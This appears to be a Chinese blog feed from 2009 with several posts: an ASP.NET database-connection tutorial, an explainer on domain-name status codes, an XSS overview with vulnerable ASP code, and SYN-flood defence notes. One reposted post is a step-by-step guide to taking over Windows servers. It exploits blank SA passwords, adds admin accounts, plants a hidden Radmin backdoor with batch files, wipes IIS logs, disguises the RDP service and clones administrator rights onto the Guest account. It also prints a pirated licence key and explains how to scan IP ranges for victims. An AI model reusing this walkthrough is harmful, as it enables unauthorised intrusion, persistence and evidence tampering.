李洪

ASP.NET2.0连接SQL Server数据库详解

81436561@qq.com(李洪) — Thu, 15 Oct 2009 06:08:27 GMT

本文将详细介绍如何使用Connection对象连接数据库。对于不同的.NET数据提供者，ADO.NET采用不同的Connection对象连接数据库。这些Connection对象为我们屏蔽了具体的实现细节，并提供了一种统一的实现方法。

　　Connection类有四种：SqlConnection，OleDbConnection，OdbcConnection和OracleConnection。

　　SqlConnection类的对象连接SQL Server数据库；OracleConnection 类的对象连接Oracle数据库；

　　OleDbConnection类的对象连接支持OLE DB的数据库，如Access；而OdbcConnection类的对象连接任何支持ODBC的数据库。与数据库的所有通讯最终都是通过Connection对象来完成的。

　　SqlConnection类

　　Connection 用于与数据库“对话”，并由特定提供程序的类（如 SqlConnection）表示。尽管SqlConnection类是针对Sql Server的，但是这个类的许多属性、方法与事件和OleDbConnection及OdbcConnection等类相似。本章将重点讲解SqlConnection特定的属性与方法，其他的Connection类你可以参考相应的帮助文档。

　　注意：使用不同的Connection对象需要导入不同的命名空间。OleDbConnection的命名空间为System.Data.OleDb。SqlConnection的命名空间为System.Data.SqlClient。OdbcConnection的命名空间为System.Data.Odbc。OracleConnection的命名空间为System.Data.OracleClinet。

　　SqlConnection属性：属性说明ConnectionString其返回类型为string,获取或设置用于打开 SQL Server 数据库的字符串。ConnectionTimeOut其返回类型为int,获取在尝试建立连接时终止尝试并生成错误之前所等待的时间。Database其返回类型为string,获取当前数据库或连接打开后要使用的数据库的名称。DataSource其返回类型为string,获取要连接的 SQL Server 实例的名称。State其返回类型为ConnectionState,取得当前的连接状态：Broken、Closed、Connecting、Fetching或Open。ServerVersion其返回类型为string,获取包含客户端连接的 SQL Server 实例的版本的字符串。PacketSize获取用来与 SQL Server 的实例通信的网络数据包的大小（以字节为单位）。这个属性只适用于SqlConnection类型
　　SqlConnection方法：

方法说明Close()其返回类型为void,关闭与数据库的连接。CreateCommand()其返回类型为SqlCommand,创建并返回一个与 SqlConnection 关联的 SqlCommand 对象。Open()其返回类型为void,用连接字符串属性指定的属性打开数据库连接
　　SqlConnection事件：

事件说明StateChange当事件状态更改时发生。（从 DbConnection 继承。）InfoMessage当 SQL Server 返回一个警告或信息性消息时发生。　　提示：可以用事件让一个对象以某种方式通知另一对象产生某些事情。例如我们在Windows系统中选择“开始”菜单，一旦单击鼠标时，就发生了一个事件，通知操作系统将“开始”菜单显示出来。
　　使用SqlConnection对象连接SQL Server数据库

　　我们可以用SqlConnection()构造函数生成一个新的SqlConnection对象。这个函数是重载的，即我们可以调用构造函数的不同版本。SqlConnection()的构造函数如下表所示：构造函数说明SqlConnection ()初始化 SqlConnection 类的新实例。SqlConnection (String)如果给定包含连接字符串的字符串，则初始化 SqlConnection 类的新实例。
　　程序代码说明：在上述语法范例的程序代码中，我们通过使用“new“关键字生成了一个新的SqlConnection对象，并且将其命名为mySqlConnection。

　　现在我们就可以使用如下两种方式连接数据库，即采用集成的Windows验证和使用Sql Server身份验证进行数据库的登录。

　　集成的Windows身份验证语法范例string connectionString="server=localhost;database=Northwind;
integrated security=SSPI";
　　程序代码说明：在上述语法范例的程序代码中，我们设置了一个针对Sql Server数据库的连接字符串。其中server表示运行Sql Server的计算机名，由于在本书中，ASP.NET程序和数据库系统是位于同一台计算机的，所以我们可以用localhost取代当前的计算机名。database表示所使用的数据库名，这里设置为Sql Server自带的一个示例数据库--Northwind。由于我们希望采用集成的Windows验证方式，所以设置 integrated security为SSPI即可。

　　Sql Server 2005中的Windows身份验证模式如下：

　　注意：在使用集成的Windows验证方式时，并不需要我们输入用户名和口令，而是把登录Windows时输入的用户名和口令传递到Sql Server。然后Sql Server检查用户清单，检查其是否具有访问数据库的权限。而且数据库连接字符串是不区分大小写的。

　　采用Sql Server身份验证的语法范例

string connectionString = "server=localhost;database=Northwind;uid=sa;pwd=sa";

　　程序代码说明：在上述语法范例的程序代码中，采用了使用已知的用户名和密码验证进行数据库的登录。uid为指定的数据库用户名，pwd为指定的用户口令。为了安全起见，一般不要在代码中包括用户名和口令，你可以采用前面的集成的Windows验证方式或者对Web.Config文件中的连接字符串加密的方式提高程序的安全性。

　　Sql Server 2005中的Sql Server身份验证模式如下：

　　如果你使用其他的数据提供者的话，所产生的连接字符串也具有相类似的形式。例如我们希望以OLE DB的方式连接到一个Oracle数据库，其连接字符串如下：

string connectionString = "data source=localhost;initial catalog=Sales;
use id=sa;password=;provider=MSDAORA";
　　程序代码说明：在上述语法范例的程序代码中，通过专门针对Oracle数据库的OLE DB提供程序，实现数据库的连接。data source 表示运行Oracle数据库的计算机名，initial catalog表示所使用的数据库名。provider表示使用的OLE DB提供程序为MSDAORA。(

域名的8种状态Status详解

81436561@qq.com(李洪) — Tue, 13 Oct 2009 08:36:42 GMT

A、域名过期后第一阶段即域名过期后1～45天内将处于注册商保留状态。whois英文状态:REGISTRAR-HOLD。

　　B、域名过期后第二阶段即注册商保留期结束之后，域名将进入30天赎回期。whois英文状态:REDEMPTION-PERIOD。

　　C、域名过期后第三阶段即赎回期结束之后域名将进入6天的删除未决期，6天期满后域名删除。whois英文状态:PENDING-Delete。

　　D、whois英文状态:REGISTRAR-LOCK是域名锁定状态，过期后防止被转移注册商。

　1、比如域名aaa.com到期时间为2003年03月01日;

　　2、从2003年03月02日开始，域名的ns将会被系统自动删除，域名无法解析，但我公司会继续保留该域名30天，用户可以在这30天的期限内续费;

　　3、如果在2所述的30天期限内没有续费，即从2003年03月31日开始，域名将变成RedemptionPeriod状态，该状态将会保持30天，在此期间该域名不会掉下来，但是除了restore命令以外的所有命令对此域名无效;

　　4、域名在RedemptionPeriod状态下可以restore回来，但每restore一次需要支付费用;

　　5、如果域名在RedemptionPeriod状态下的30天没有restore，从2003.04.29开始域名变成PendingDelete状态(5天)，2003年05月04日该域名将会删除。

　　VeriSign于2003年1月在其Registry Whois (.COM和.NET)中加了3个字段:

　　Status、Creation Date、Expiration Date

其中 Status 目前发现有8种状态，分别是：

1、ACTIVE：活动状态。由Registry设置；该域名可以由Registrar更改；可以续费；至少被指派一个DNS。

2、REGISTRY-LOCK：注册局锁定。由注册局设置；该域名不可以由注册商更改、删除；必须由注册局解除此状态才可以由注册商更改域名信息；域名可以续费；如果域名被指派至少一个DNS则可以包含在(域名根服务器)的区域中(可以正常使用)。

3、REGISTRY-HOLD：注册局保留。由注册局设置；该域名不可以由注册商更改、删除；必须由注册局解除此状态才可以由注册商更改域名信息；域名可以续费；该域名不包括在(域名根服务器)的区域中(不能正常使用)。

4、REGISTRAR-LOCK：注册商锁定。由该域名的原始注册商设置；该域名不可以被更改或删除；必须由注册商解除此状态才可以更改域名信息；该域名可以续费。该域名包含在(域名根服务器)的区域中(可以正常使用)。

5、REGISTRAR-HOLD：注册商保留。由该域名的原始注册商设置；该域名不可以被更改或删除；必须由注册商解除此状态才可以更改域名信息；该域名可以续费。该域名不包括在(域名根服务器)的区域中(不能正常使用)。

6、REDEMPTIONPERIOD：宽限期。当注册商向注册局提出删除域名请求后，由注册局将域名设置称此状态，不过，条件是该域名已经注册了5天以上（如果该域名注册时间不足5天，则立即删除）；该域名不包括在(域名根服务器)的区域中(不能正常使用)；该域名不可以被更改或清除，只可以被恢复；任何其他注册商提出对此域名的更改或其他请求都将被拒绝；该状态最多保持30天。

7、PENDINGRESTORE：恢复未决。当注册商提出将处于REDEMPTIONPERIOD的域名恢复请求后，由注册局设置；该域名包含在(域名根服务器)的区域中(可以正常使用)；注册商提出的更改或任何其他请求都将被拒绝；在7天之内，有注册商向注册局提供必需的恢复文件，如果注册商在7天之内提供了这些文件，该域名将被置为ACTIVE状态，否则，该域名将重新返回到REDEMPTIONPERIOD状态。

8、PENDINGDelete：删除未决。如果一个域名在被设置成REDEMPTIONPERIOD状态期间内，注册商没有提出恢复请求，那么，域名将被置于PENDINGDelete状态，注册商对此域名的任何请求都将被拒绝；5天之后清除。

引用内容
1、.COM/.NET域名状态包括：

(1) ACTIVE(激活状态):域名处于此状态时可以正常使用、正常续费、可以转移、可以更改DNS和域名信息，在此状态时用户还可自行设置为锁定状态。

(2) Customer-LOCK(用户锁定):当域名在ACTIVE状态时可由用户自行设置，用户可自行取消，域名处于此状态时可以正常使用、正常续费、不可以转移、不可以更改DNS和域名信息，此状态也可以由注册商取消；

(3) Registrar-LOCK(注册商锁定):由注册商设置，用户不能取消。域名处于此状态时可以正常使用、正常续费、不可以转移、不可以更改DNS和域名信息，此状态也可以由注册商取消；

(4) Autorenew-HOLD(欠费保留):由注册商设置，用户不能取消。域名由于过期欠费而被设置为此状态，域名处于此状态时不能正常使用、不可以被更改或删除；必须续费后才能自动解除此状态。

(5) Registrar-HOLD(注册商保留):由注册商设置，用户不能取消。域名处于此状态时不能正常使用、不可以删除、不可以转移、更改DNS和域名信息，可以续费，必须由注册商解除此状态。

2、.ORG域名状态包括：
(1) OK(正常状态):域名处于此状态时可以正常使用、正常续费、可以转移、可以更改DNS和域名信息，此状态不与下面的其他状态同时存在。

(2) Customer-DeleteProhibited(用户限制删除):由用户自行设定的限制删除，用户可自行取消，域名处于此状态时可以正常使用、正常管理、正常续费、不可以被删除，此状态也可以由注册商取消，同时，若域名欠费后会自动按删除周期删除；

(3) Registrar-DeleteProhibited(注册商限制删除):由注册商设定的限制删除，域名处于此状态时可以正常使用、正常管理、正常续费、不可以被删除，此状态不可以由用户自行取消，同时，若域名欠费后会自动按删除周期删除；

(4) Customer-TransferProhibited(用户限制转移):由用户自行设定的限制转移，用户可自行取消，域名处于此状态时不可以转移、可以正常使用、正常管理、正常续费，此状态也可以由注册商取消；

(5) Registrar-TransferProhibited(注册商限制转移):由注册商设定的限制转移，域名处于此状态时不可以转移、可以正常使用、正常管理、正常续费，用户不可以自行取消该状态；

(6) Customer-UpdateProhibited(用户限制更改):由用户自行设定的限制更改，用户可自行取消，域名处于此状态时不可以更改域名信息和DNS、可以正常使用、正常续费，此状态也可以由注册商取消；

(7) Registrar-UpdateProhibited(注册商限制更改):由注册商设定的限制更改，域名处于此状态时不可以更改域名信息和DNS、可以正常使用、正常续费，用户不可以自行取消该状态；

(8) Autorenew-HOLD(欠费保留):由注册商设置，用户不能取消。域名由于过期欠费而被设置为此状态，域名处于此状态时不能正常使用、不可以被更改或删除；必须续费后才能自动解除此状态。

(9) Registrar-HOLD(注册商保留):由注册商设置，用户不能取消。域名处于此状态时不能正常使用、不可以删除、不可以转移，可以续费，必须由注册商解除此状态。责任编辑:

[转]SA空口令入侵到3389终结完整编

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:52:28 GMT

工具:WINNTAutoAttack自动攻击器(扫漏洞)

SQLTOOLS(SA空口令连接器)

RAMDIN影子3.0中文版(远程控制程序)

RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序)

CleanIISLog.exe(小榕的擦PP程序)

3389.exe(开3389端口服务的)

psu.exe(使用被禁止的Guest帐户要用到的)

mstsc.exe(远程桌面连接程序)

下载(点右键用下载工具下)

一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新

2、在本地设置服务端（一定要生成）

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg

4、编写一个批处理，并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理，r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成

四.用RADMIN客服端连接....

上传文件到c:\WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门

RADMIN进入TELNET

运行 c:\winnt\3389.exe

重启肉鸡

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:\query user (查看对方目前终端登陆状况。)

运行命令

c:\logoff 1(踢出去一个管理者)

再用c:\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\winnt\log . 自己的IP .(擦PP)

c:\winnet\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

--------------------------------------------

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

--------------------------------------------

按F5(运行)

关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录)

八.改3389端口和服务名称

修改服务器端的端口设置，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

PortNumber值，默认是3389，选择10进制修改成所希望的端口，比如1314

第二个地方：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]　

PortNumber值，默认是3389，选择10进制修改成所希望的端口，比如1314

要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

的键值为mm.reg文件.

编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行)

再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter)

保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)

再在CMD下

CD c:\winnt\system32

copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C:\winnt

sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..

十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值

如:psu -p regedit -i 157

将Guest克成管理员权限

克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值.

在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类型值的数据) 然后删除Guest的配置

2.查看计算机管理中帐户列表刷新这时候会出现错误[找不到帐户](跳过这步也行)

3.将Guest的配置(二个REG文件导进注册表)

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]

net user Guest **** [修改密码]

net user Guest /active:yes

net user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用.

6.用Guest登陆后删除自己建的帐号

net user mint /del

整个过程结束

最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵

整个过程全部结束..这机子就真正变成你的肉鸡了...

文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助)

笑语☆嫣然的《终结3389》

mervin制作 <《终结3389》补充版>

孤狼望月 <使用被禁用的帐户[Guest]登陆>

(他还有个(隐藏帐号后门教程)也差不多)

碎片

最后送一个找固定IP肉鸡的方法:

菜菜鸟教程之－如何提高扫描到肉鸡的机会 BY：网络凡人

先找个有不正常端口的代理，代理我一般到网迷之家(www.52cyq.com)拿的。就这个好了

218.58.88.15:45576 [山东省青岛市](我的是教育网，扫描不到国外的机的，所以用国内的IP来

做试范），我把它扩充了整一个网段。由218.58.88.1－218.58.88.255你可以扩充成218.58.80.1－

218.58.90.255 .端口为了减少动画的大小，就扫描3389好了，。IP扩充多少就要看你

的网快还是慢。快的就扩充多点，慢的只扫描一个c段IP好了。看到没有，[218.58.88.8]:

发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的

　

[转]跨站Script攻击

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:46:44 GMT

每当我们想到黑客的时候，黑客往往是这样一幅画像：一个孤独的人，悄悄进入别人的服务器中，进行破坏或者窃取别人的秘密资料。
　　也许他会更改我们的主页，甚者会窃取客户的信用卡号和密码。另外，黑客还会攻击访问我们网站的客户。与此同时，我们的服务器也成了他的帮凶。微软称这种攻击为“跨站script”攻击。而这种攻击大多数都发生在网站动态产生网页的时侯，但黑客的目标并不是你的网站，而是浏览网站的客户。跨站script攻击的说明在一本名为<>的杂志中，CERT警告大家：如果服务器对客户的输入不进行有效验证，黑客就会输入一些恶意的HTML代码，当这些HTML代码输入是用于SCRIPT程序，他们就能利用它来进行破坏，如插入一些令人厌恶的图片或声音等，同时，也能干扰了客户正确浏览网页。
　　我们知道，有些朋友曾经被诱导到一些可疑的免费网站，他们得到的仅仅是10到20个小的窗口，这些窗口常常伴随着由JAVA 或 javascript生成的失效安钮，这被称为鼠标陷阱。关闭这些窗口是徒劳的，每当我们关闭一个窗口，又会有10几个窗口弹出。这种情况常常发生在管理员没在的时侯发生。鼠标事件是黑客利用跨站SCRIPT方法攻客户的典型范例。恶意的标签和SCRIPT不单纯的恶作剧，他们甚至可以窃取资料和捣毁系统。一个聪明的甚至是不够聪明的黑客都能够使用SCRIPT干扰或者改变服务器数据的输入。利用SCRIPT代码也能攻击客户系统，让你的硬盘尽损。而且你要知道，在你一边使用服务器的时候，黑客的SCRIPT也正在你服务器里安全的地方运行着的呀！如果客户对你的服务器非常信认，同样他们也会信任那些恶意的SCRIPT代码。甚至这个代码是以〈SCRIPT〉或者〈OBJECT〉的形式来自黑客的服务器。
　　即使使用了防火墙（SSL）也不能防止跨站SCRIPT的攻击。那是因为如果生成恶意SCRIPT代码的设备也使用了SSL，我们服务器的SSL是不能辨别出这些代码来的。我们难道就这样把客户曾经那么信任的网站拱手让给黑客吗？而且有这种破坏的存在，会让你网站名誉尽损的。
　　一、跨站SCRIPT攻击示例：根据CERT的资料，动态输入大致有这几种形式：URL参数，表格元素，COOKISE以及数据请求。
　　让我们来分析一下，这个只有两个页面的网站，网站名为：MYNICESITE.COM。
　　第一页使用一张表格或COOKIE来获取用户名：
<%@ Language=VBScript %>
<%
If Request.Cookies("userName") <> "" Then
Dim strRedirectUrl
strRedirectUrl = "page2.ASP?userName="
strRedirectUrl = strRedirectUrl & Response.Cookies("userName")
Response.Redirect(strRedirectUrl)
Else
%>

Home Page

Home Page

<% End If %>　　第二页返回用户名以示欢迎：
<%@ Language=VBScript %>
<%
Dim strUserName
If Request.QueryString("userName")<> "" Then
strUserName = Request.QueryString("userName")
Else
Response.Cookies("userName") = Request.Form("userName")
strUserName = Request.Form("userName")
End If
%>

Hello: <%= strUserName %>

　　当你正常常输入文字时，一切都很正常。如果你输入Script代码：,javascript警告标签就会弹出来：在你下一次访问时，这个警示标签同样会出现；这是因为这个Script代码在你第一次访问的时后就已经留在cookie中了。这是一个简单的跨站攻击的范例。
　　如果你认为这是一个特殊情况，你也不妨到网上别的地方看看，亲自试一下。我曾经对一些大型的政府网站、教育网站以及商业网站进行过测试，他们当中的确有部分出现了以上所说的情况，我甚至发现了我经常使用信用卡的网站也居然对输入不进行任何过滤，想想真是可怕。

[转]SYN攻击原理以及防范技术2

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:46:20 GMT

■SYN代理：　　当客户端SYN包到达过滤网关时，SYN代理并不转发SYN包，而是以服务器的名义主动回复SYN/ACK包给客户，如果收到客户的ACK包，表明这是正常的访问，此时防火墙向服务器发送ACK包并完成三次握手。SYN代理事实上代替了服务器去处理SYN攻击，此时要求过滤网关自身具有很强的防范SYN攻击能力。
　　2、加固tcp/ip协议栈
　　防范SYN攻击的另一项主要技术是调整tcp/ip协议栈，修改tcp协议实现。主要方法有SynAttackProtect保护机制、SYN cookies技术、增加最大半连接和缩短超时时间等。tcp/ip协议栈的调整可能会引起某些功能的受限，管理员应该在进行充分了解和测试的前提下进行此项工作。
　　■SynAttackProtect机制
　　为防范SYN攻击，win2000系统的tcp/ip协议栈内嵌了SynAttackProtect机制，Win2003系统也采用此机制。SynAttackProtect机制是通过关闭某些socket选项，增加额外的连接指示和减少超时时间，使系统能处理更多的SYN连接，以达到防范SYN攻击的目的。默认情况下，Win2000操作系统并不支持SynAttackProtect保护机制，需要在注册表以下位置增加SynAttackProtect键值：
HKLMSYSTEMCurrentControlSetServicesTcpipParameters
　　当SynAttackProtect值（如无特别说明，本文提到的注册表键值都为十六进制）为0或不设置时，系统不受SynAttackProtect保护。
　　当SynAttackProtect值为1时，系统通过减少重传次数和延迟未连接时路由缓冲项（route cache entry）防范SYN攻击。
　　当SynAttackProtect值为2时（Microsoft推荐使用此值），系统不仅使用backlog队列，还使用附加的半连接指示，以此来处理更多的SYN连接，使用此键值时，tcp/ip的TCPInitialRTT、window size和可滑动窗囗将被禁止。
　　我们应该知道，平时，系统是不启用SynAttackProtect机制的，仅在检测到SYN攻击时，才启用，并调整tcp/ip协议栈。那么系统是如何检测SYN攻击发生的呢？事实上，系统根据TcpMaxHalfOpen,TcpMaxHalfOpenRetried 和TcpMaxPortsExhausted三个参数判断是否遭受SYN攻击。
　　TcpMaxHalfOpen 表示能同时处理的最大半连接数，如果超过此值，系统认为正处于SYN攻击中。Win2000　server默认值为100，Win2000　Advanced server为500。
　　TcpMaxHalfOpenRetried定义了保存在backlog队列且重传过的半连接数，如果超过此值，系统自动启动SynAttackProtect机制。Win2000　server默认值为80，Win2000 Advanced server为400。
　　TcpMaxPortsExhausted　是指系统拒绝的SYN请求包的数量，默认是5。
　　如果想调整以上参数的默认值，可以在注册表里修改（位置与SynAttackProtect相同）
■ SYN cookies技术
　　我们知道，TCP协议开辟了一个比较大的内存空间backlog队列来存储半连接条目，当SYN请求不断增加，并这个空间，致使系统丢弃SYN连接。为使半连接队列被塞满的情况下，服务器仍能处理新到的SYN请求，SYN cookies技术被设计出来。
　　SYN cookies应用于linux、FreeBSD等操作系统，当半连接队列满时，SYNcookies并不丢弃SYN请求，而是通过加密技术来标识半连接状态。
　　在TCP实现中，当收到客户端的SYN请求时，服务器需要回复SYN＋ACK包给客户端，客户端也要发送确认包给服务器。通常，服务器的初始序列号由服务器按照一定的规律计算得到或采用随机数，但在SYN cookies中，服务器的初始序列号是通过对客户端IP地址、客户端端囗、服务器IP地址和服务器端囗以及其他一些安全数值等要素进行hash运算，加密得到的，称之为cookie。当服务器遭受SYN攻击使得backlog队列满时，服务器并不拒绝新的SYN请求，而是回复cookie（回复包的SYN序列号）给客户端，如果收到客户端的ACK包，服务器将客户端的ACK序列号减去1得到cookie比较值，并将上述要素进行一次hash运算，看看是否等于此cookie。如果相等，直接完成三次握手（注意：此时并不用查看此连接是否属于backlog队列）。
　　在RedHat linux中，启用SYN cookies是通过在启动环境中设置以下命令来完成：
# echo 1 ?? /proc/sys/net/ipv4/tcp_syncookies
　　■ 增加最大半连接数
　　大量的SYN请求导致未连接队列被塞满，使正常的TCP连接无法顺利完成三次握手，通过增大未连接队列空间可以缓解这种压力。当然backlog队列需要占用大量的内存资源，不能被无限的扩大。
　　WIN2000：除了上面介绍的TcpMaxHalfOpen, TcpMaxHalfOpenRetried参数外，WIN2000操作系统可以通过设置动态backlog(dynamic backlog)来增大系统所能容纳的最大半连接数，配置动态backlog由AFD.SYS驱动完成，AFD.SYS是一种内核级的驱动，用于支持基于window socket的应用程序，比如ftp、telnet等。AFD.SYS在注册表的位置：

　　HKLMSystemCurrentControlSetServicesAFDParametersEnableDynamicBacklog值为1时，表示启用动态backlog，可以修改最大半连接数。　
　　MinimumDynamicBacklog表示半连接队列为单个TCP端囗分配的最小空闲连接数，当该TCP端囗在backlog队列的空闲连接小于此临界值时，系统为此端囗自动启用扩展的空闲连接（DynamicBacklogGrowthDelta），Microsoft推荐该值为20。
　　MaximumDynamicBacklog是当前活动的半连接和空闲连接的和，当此和超过某个临界值时，系统拒绝SYN包，Microsoft推荐MaximumDynamicBacklog值不得超过2000。
　　DynamicBacklogGrowthDelta值是指扩展的空闲连接数，此连接数并不计算在MaximumDynamicBacklog内，当半连接队列为某个TCP端囗分配的空闲连接小于MinimumDynamicBacklog时，系统自动分配DynamicBacklogGrowthDelta所定义的空闲连接空间，以使该TCP端囗能处理更多的半连接。Microsoft推荐该值为10。
　　LINUX：Linux用变量tcp_max_syn_backlog定义backlog队列容纳的最大半连接数。在Redhat 7.3中，该变量的值默认为256，这个值是远远不够的，一次强度不大的SYN攻击就能使半连接队列占满。我们可以通过以下命令修改此变量的值：
# sysctl -w net.ipv4.tcp_max_syn_backlog=`2048`
　　Sun Solaris Sun Solaris用变量tcp_conn_req_max_q0来定义最大半连接数，在Sun Solaris 8中，该值默认为1024，可以通过add命令改变这个值：
# ndd -set /dev/tcp tcp_conn_req_max_q0 2048
　　HP-UX：HP-UX用变量tcp_syn_rcvd_max来定义最大半连接数，在HP-UX　11.00中，该值默认为500，可以通过ndd命令改变默认值：
＃ndd -set /dev/tcp tcp_syn_rcvd_max 2048
　　■缩短超时时间
　　上文提到，通过增大backlog队列能防范SYN攻击；另外减少超时时间也使系统能处理更多的SYN请求。我们知道，timeout超时时间，也即半连接存活时间，是系统所有重传次数等待的超时时间总和，这个值越大，半连接数占用backlog队列的时间就越长，系统能处理的SYN请求就越少。为缩短超时时间，可以通过缩短重传超时时间（一般是第一次重传超时时间）和减少重传次数来实现。
　　Win2000第一次重传之前等待时间默认为3秒，为改变此默认值，可以通过修改网络接囗在注册表里的TcpInitialRtt注册值来完成。重传次数由TcpMaxConnectResponseRetransmissions 来定义，注册表的位置是：HKLMSYSTEMCurrentControlSetServicesTcpipParameters registry key。
　　当然我们也可以把重传次数设置为0次，这样服务器如果在3秒内还未收到ack确认包就自动从backlog队列中删除该连接条目。
　　LINUX：Redhat使用变量tcp_synack_retries定义重传次数，其默认值是5次，总超时时间需要3分钟。
　　Sun Solaris Solaris　默认的重传次数是3次，总超时时间为3分钟，可以通过ndd命令修改这些默认值。

[转]SYN攻击原理以及防范技术1

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:45:19 GMT

　一、TCP握手协议　　在TCP/IP协议中，TCP协议提供可靠的连接服务，采用三次握手建立一个连接。
　　第一次握手：建立连接时，客户端发送syn包(syn=j)到服务器，并进入SYN_SEND状态，等待服务器确认；
　　第二次握手：服务器收到syn包，必须确认客户的SYN（ack=j+1），同时自己也发送一个SYN包（syn=k），即SYN+ACK包，此时服务器进入SYN_RECV状态；
　　第三次握手：客户端收到服务器的SYN＋ACK包，向服务器发送确认包ACK(ack=k+1)，此包发送完毕，客户端和服务器进入ESTABLISHED状态，完成三次握手。
　　完成三次握手，客户端与服务器开始传送数据，在上述过程中，还有一些重要的概念：
　　未连接队列：在三次握手协议中，服务器维护一个未连接队列，该队列为每个客户端的SYN包（syn=j）开设一个条目，该条目表明服务器已收到SYN包，并向客户发出确认，正在等待客户的确认包。这些条目所标识的连接在服务器处于Syn_RECV状态，当服务器收到客户的确认包时，删除该条目，服务器进入ESTABLISHED状态。

　　Backlog参数：表示未连接队列的最大容纳数目。
　　SYN-ACK 重传次数　服务器发送完SYN－ACK包，如果未收到客户确认包，服务器进行首次重传，等待一段时间仍未收到客户确认包，进行第二次重传，如果重传次数超过系统规定的最大重传次数，系统将该连接信息从半连接队列中删除。注意，每次重传等待的时间不一定相同。
　　半连接存活时间：是指半连接队列的条目存活的最长时间，也即服务从收到SYN包到确认这个报文无效的最长时间，该时间值是所有重传请求包的最长等待时间总和。有时我们也称半连接存活时间为Timeout时间、SYN_RECV存活时间。
　　二、SYN攻击原理
